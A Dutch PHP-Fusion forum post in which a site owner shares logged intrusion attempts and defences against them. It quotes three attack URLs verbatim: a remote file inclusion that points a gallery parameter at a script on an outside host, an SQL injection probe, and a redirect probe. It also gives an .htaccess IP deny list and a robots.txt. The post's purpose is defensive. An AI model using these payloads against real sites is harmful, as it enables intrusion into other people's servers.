Thread subject: pHpFusion Nederlands (BE|NL) » Ondersteuning, Themas, Infusies, Modificaties en Installatie :: Onderschepte intrusions

Posted by Masy on 13 August 2014, 19:33
#1

Sinds de publicatie van m'n website log ik alles.
Hieronder volgt een opsomming van mogelijke SQL-injecties of andere Fusion-attacks.

Wat je moet doen is uitloggen en de url kopieeren in de browser-balk.
Kijk en ervaar wat er gebeurt:

Je site:/login.php?error=1&redirect=%2Fnews.p
Je site:/photogallery.php?album_id=http://77.65.23.211/images/top/kb.txt?&&r=s&
Je site:/news_cats.php?cat_id=13%2band%2b1%3dselect%2b1--%2b-

Dit zijn slechts enkele bekende intrusions... Als je ervan af wil is dit een .htaccess file:

order allow,deny
deny from 80.101.152.84
deny from 187.40.
deny from 88.150.141.44
deny from 202.62.
deny from 62.219.

allow from all

Dan heb je nog de bots/crawlers. Er zijn bots die zich nergens aan houden.
Dit is mijn robots.txt:
User-agent: *
Disallow: /
Disallow: /administration/
Disallow: /locale/
Disallow: /themes/
Disallow: /print.php
Disallow: /infusions/bottrap/badbots.php

User-agent: MJ12bot
Disallow: /

Met name de MJ12bot houdt zich nergens aan...

Gebruik het Honeypot : http://www.projecthoneypot.org/
voor opsporing en misbruik. En "flikker" misbruikers eruit.